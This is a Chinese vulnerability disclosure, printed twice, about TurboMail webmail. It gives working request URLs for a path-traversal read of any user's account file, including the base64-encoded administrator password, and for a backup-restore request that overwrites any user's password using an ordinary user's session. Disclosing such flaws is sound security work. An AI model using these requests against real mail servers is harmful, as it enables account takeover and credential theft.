VULHUB ™

### 简要描述： TurboMail邮箱系统越权读取任意文件（可读取管理员密码等） ### 详细说明： http://localhost/tmw/8/viewfile/account.xml?type=gl&logtype=../../turbomail/accounts/root/postmaster（你想要读密码的用户名）&sessionid=此处需普通用户sessionid 可以读取任意用户密码 此处导入的是zip文件，会自动解压，你也可以导入你上传的其他文件，如图片后缀的zip也可以解压 http://localhost/tmw/8/mailmain?type=restorebackup&filename=/tmbackup2014-05-17_18_10_1.php&sessionid=此处需普通用户sessionid&intertype=ajax 可以替换修改任意用户密码，包括管理员 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201405/1919010157b48bef8fbd045b6c736e225b29938f.png" alt="F66F9DBC-A57C-4D2B-A9E5-1D0BC491F672.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1919010157b48bef8fbd045b6c736e225b29938f.png) 标红处为管理员账号密码。密码为base64 解密即可 同理，可以读取任意用户的密码及任意文件。

### 简要描述： TurboMail邮箱系统越权读取任意文件（可读取管理员密码等） ### 详细说明： http://localhost/tmw/8/viewfile/account.xml?type=gl&logtype=../../turbomail/accounts/root/postmaster（你想要读密码的用户名）&sessionid=此处需普通用户sessionid 可以读取任意用户密码 此处导入的是zip文件，会自动解压，你也可以导入你上传的其他文件，如图片后缀的zip也可以解压 http://localhost/tmw/8/mailmain?type=restorebackup&filename=/tmbackup2014-05-17_18_10_1.php&sessionid=此处需普通用户sessionid&intertype=ajax 可以替换修改任意用户密码，包括管理员 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201405/1919010157b48bef8fbd045b6c736e225b29938f.png" alt="F66F9DBC-A57C-4D2B-A9E5-1D0BC491F672.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1919010157b48bef8fbd045b6c736e225b29938f.png) 标红处为管理员账号密码。密码为base64 解密即可 同理，可以读取任意用户的密码及任意文件。